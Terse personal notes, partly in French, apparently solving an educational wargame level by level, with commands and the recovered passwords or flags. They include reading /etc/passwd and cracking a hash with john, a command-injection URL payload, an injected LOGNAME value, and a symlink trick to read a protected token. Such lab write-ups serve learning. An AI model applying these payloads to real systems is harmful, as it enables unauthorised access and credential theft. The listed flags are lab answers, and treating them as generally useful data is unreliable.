level00:

find / -user flag00 2>/dev/null
	-> /usr/sbin/john

cat john
	-> cdiiddwpgswtgt

cesar code (dcode.fr)
	-> nottoohardhere

x24ti5gi3x0o12eh4esiuxias

----------------------------------

level01:

cat /etc/passwd
	-> 42hDRfypTqqnw

echo 42hDRfypTqqnw > file

john file --show
	-> abcdefg

f2av5il02puano7naaf6adaaf

----------------------------------

scp -P 4242 level02@localhost:level02.pcap

wireshark level02.pcap

string "Password:" -> follow

ft_wandr...NDRe1.L0L
	-> ft_waNDReL0L

kooda2puivaav1idi4f57q8iq

----------------------------------

need file -> crack.c

ltrace ./level03

gcc crack.c -o echo

cd ~

./level03

qi0maab88jeaj46qoumi7maus

-----------------------------------

127.0.0.1:4747/?x=$(/bin/getflag)

ne2searoevaevoem4ov4ar8ap

-----------------------------------

need file -> crack.sh

find / -user flag05
	-> /usr/sbin/openarenaserver

put crack.sh -> /opt/openarenaserver/crack.sh

viuaaale9huek52boumoomioc

----------------------------------

need file -> crack

! pas level06.php
./level06 /tmp/file

wiok45aaoguiboiki2tuin6ub

-----------------------------------

ltrace ./level07

LOGNAME="; /bin/getflag"

fiumuikeil55xe9cu4dood66h

-----------------------------------

ltrace ./level08

chmod 755 .

ln -s token tekken

./level08 tekken

quif5eloekouj29ke0vouxean

su flag08

25749xKZ8L7DkSCwJkT9dyv6f

-----------------------------------

need crack.c

gcc -o crack crack.c

./crack token
	-> f3iji1ju5yuevaus41q1afiuq
	(sans le dernier char prcq ct un retour a la ligne)

su level10

s5cAJpM8ev6XHw998pRWG728z

--------------------------------------


